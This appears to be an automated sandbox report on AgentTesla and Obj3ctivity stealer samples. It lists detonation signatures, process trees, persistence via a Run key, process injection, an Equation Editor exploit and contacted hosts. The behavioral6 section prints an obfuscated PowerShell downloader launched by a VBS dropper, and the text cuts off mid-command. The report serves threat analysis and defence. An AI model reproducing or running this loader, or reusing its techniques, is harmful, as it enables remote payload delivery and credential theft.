Malware Analysis Report

2024-11-30 05:51

Sample ID 241120-wxl39a1ka1
Target 5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d
SHA256 5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d
Tags
obj3ctivity discovery stealer agenttesla keylogger persistence spyware trojan execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d

Threat Level: Known bad

The file 5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d was found to be: Known bad.

Malicious Activity Summary

obj3ctivity discovery stealer agenttesla keylogger persistence spyware trojan execution

Detects Obj3ctivity Stage1

Agenttesla family

Obj3ctivity, PXRECVOWEIWOEI

Obj3ctivity family

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Looks up external IP address via web service

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

Unsigned PE

Office loads VBA resources, possible macro or embedded object present

Runs ping.exe

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Launches Equation Editor

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 18:18

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1740 -ip 1740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 1676

Network

Country Destination Domain Proto
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 78.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp

Files

memory/1740-0-0x0000000074B3E000-0x0000000074B3F000-memory.dmp

memory/1740-1-0x0000000000D90000-0x0000000000DA4000-memory.dmp

memory/1740-2-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/1740-3-0x0000000074B30000-0x00000000752E0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

129s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf"

Signatures

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
US 8.8.8.8:53 hartac.co.za udp
ZA 154.0.162.16:80 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp
ZA 154.0.162.16:443 hartac.co.za tcp

Files

memory/2472-0-0x000000002F1F1000-0x000000002F1F2000-memory.dmp

memory/2472-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2472-2-0x0000000070EFD000-0x0000000070F08000-memory.dmp

memory/2472-6-0x0000000070EFD000-0x0000000070F08000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240708-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1476

Network

Country Destination Domain Proto
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp

Files

memory/3032-0-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/3032-1-0x0000000000980000-0x0000000000996000-memory.dmp

memory/3032-2-0x00000000742A0000-0x000000007498E000-memory.dmp

memory/3032-3-0x00000000742A0000-0x000000007498E000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe

"C:\Users\Admin\AppData\Local\Temp\a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4876 -ip 4876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1568

Network

Country Destination Domain Proto
US 8.8.8.8:53 66.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp
US 8.8.8.8:53 78.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/4876-0-0x00000000750CE000-0x00000000750CF000-memory.dmp

memory/4876-1-0x0000000000020000-0x0000000000036000-memory.dmp

memory/4876-2-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4876-3-0x00000000750C0000-0x0000000075870000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Running = "C:\\Users\\Admin\\AppData\\Roaming\\Running\\Running.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2532 set thread context of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2532 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/2532-10-0x0000000000130000-0x0000000000134000-memory.dmp

memory/1588-11-0x0000000000400000-0x0000000000442000-memory.dmp

memory/1588-15-0x0000000000400000-0x0000000000442000-memory.dmp

memory/1588-14-0x0000000000400000-0x0000000000442000-memory.dmp

memory/1588-16-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/1588-17-0x00000000742A0000-0x000000007498E000-memory.dmp

memory/1588-20-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/1588-21-0x00000000742A0000-0x000000007498E000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 104.86.110.81:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.22.5.218:80 www.microsoft.com tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

156s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 67.84.21.104.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 41.173.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20241010-en

Max time kernel

126s

Max time network

132s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2600 wrote to memory of 2888 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2888 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2888 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2840 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2840 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2840 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2840 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping %.%.%.%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks 